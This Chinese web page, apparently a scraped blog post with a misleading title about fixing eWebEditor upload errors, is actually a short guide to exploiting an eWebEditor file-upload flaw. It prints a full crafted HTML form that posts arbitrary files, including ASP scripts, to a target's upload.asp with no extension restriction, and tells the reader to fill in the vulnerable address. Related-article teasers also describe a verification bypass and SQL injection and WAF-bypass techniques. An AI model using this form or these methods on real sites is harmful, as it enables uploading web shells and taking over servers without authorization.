网站优化

首页 > 新闻资讯 > 网站优化 > ewebeditor编辑器上传错误的问题解决

ewebeditor编辑器上传错误的问题解决

2019-09-12 热度:339 ℃
有时候进了ewebeditor编辑器后台,上传类型修改后可以上传asp和asa等等。
 
可是由于一些原因.却上传不了或上传后提示找不到文件,或者无法显示等等。
 
用法:在地址上填编辑器上传漏洞地址,样式名上填编辑器的样式名,然后上传你所要上传的文件就行了。
 
然后,在源文件找地址。

<script language=javascript>parent.UploadError('无效的样式ID号,请通过页面上的链接进行操作!');history.back()</script>  
<HTML>  
<HEAD>  
<TITLE>文件上传</TITLE>  
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">  
<style type="text/css">   
body, a, table, div, span, td, th, input, select{font:9pt;font-family: "宋体", Verdana, Arial, Helvetica, sans-serif;}  
body {padding:0px;margin:0px}  
</style>  
<script language="JavaScript" src="dialog/dialog.js"></script>  
</head>  
<body bgcolor=menu>  
<form action=" www.2cto.com /path/upload.asp?action=save&type=&style=样式名" method=post name=myform enctype="multipart/form-data">  
<input type=file name=uploadfile size=1 style="width:100%">  
<input type=submit value="上传了"></input>  
<script language=javascript>  
var sAllowExt = "";  
// 检测上传表单  
function CheckUploadForm() {  
if (!IsExt(document.myform.uploadfile.value,sAllowExt)){  
   parent.UploadError("提示:\n\n请选择一个有效的文件,\n支持的格式有("+sAllowExt+")!");  
   return false;  
}  
return true  
}   
// 提交事件加入检测表单  
var oForm = document.myform ;  
oForm.attachEvent("onsubmit", CheckUploadForm) ;  
if (! oForm.submitUpload) oForm.submitUpload = new Array() ;  
oForm.submitUpload[oForm.submitUpload.length] = CheckUploadForm ;  
if (! oForm.originalSubmit) {  
oFormoForm.originalSubmit = oForm.submit ;  
oForm.submit = function() {  
   if (this.submitUpload) {  
    for (var i = 0 ; i < this.submitUpload.length ; i++) {  
     this.submitUpload() ;  
    }  
   }  
   this.originalSubmit() ;  
}  
}  
// 上传表单已装入完成  
try {  
parent.UploadLoaded();  
}  
catch(e){  
}  
</script>  
</body>  
</html> 

相关文章

115网盘可绕过验证直接加好友

115网盘可绕过验证直接加好友

随便找个没有验证过的好友请求,几下请求编号nid   然后:   POST /?ac=add_friend HTTP/1.1 Host: msg.115.c...

见招拆招:绕过WAF继续SQL注入常用方法

见招拆招:绕过WAF继续SQL注入常用方法

  这篇文章之前的名字叫做:WAF bypass for SQL injection #理论篇,我于6月17日投稿了Freebuf。链接:点击这里 现博客恢复,特发此处。  ...

易想团购系统通杀SQL注入漏洞分析及利用

易想团购系统通杀SQL注入漏洞分析及利用

看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序。 找到get_client_ip()函数: // 获取客户端IP地址 funct...

代码审计:ThinkPHP框架通杀所有版本的一个SQL注入漏洞详细分析及测试方法

代码审计:ThinkPHP框架通杀所有版本的一个SQL注入漏洞详细分析及测试方法

下面是摘自thinkphp官方的一个公告,官方直接贴出这些东西是非常不负责的行为,跟上次apache公开的Struts2的代码执行一样的行为,会造成很多用户被黑。建议类似的厂商不要再做这...

依赖倒置(DIP),控制反转(IoC)与依赖注入(DI)

依赖倒置(DIP),控制反转(IoC)与依赖注入(DI)

依赖倒置 DIP(Dependency Inversion Principle) DIP的两大原则: 1、高层模块不应该依赖于低层模块,二者都应该依赖于抽象。 2、抽象不应该依赖...

跨站脚本攻击xss

跨站脚本攻击xss

一、认识XSS先  先说个故事吧,在上一篇,我还想说这个案例。其实什么叫攻击,很简单。获取攻击者想要的信息,就黑成功了。抓到一个Tomcat漏洞(这不是我说的,一个认识的人说的...

IIS安全加固策略-应对攻击入侵策略

IIS安全加固策略-应对攻击入侵策略

  1. 缓冲区溢出  简单解释一下,缓冲区溢出主要因为提交的数据长度超出了服务器正常要求,导致服务器检查代码错误。而溢出的方法有可以分为:基于堆栈的溢出和基于堆的溢出。在IIS 6以...

我们检测到您可能使用 AdBlock 或者其他广告屏蔽插件,导致网页出现错位、变形以及丢失的情况,影响网站内容的阅读。
本站无任何商业广告!为了伍林堂平台的生存,恳请您能够理解,将伍林堂旗下交互产品加入白名单(方法点此),万分感谢!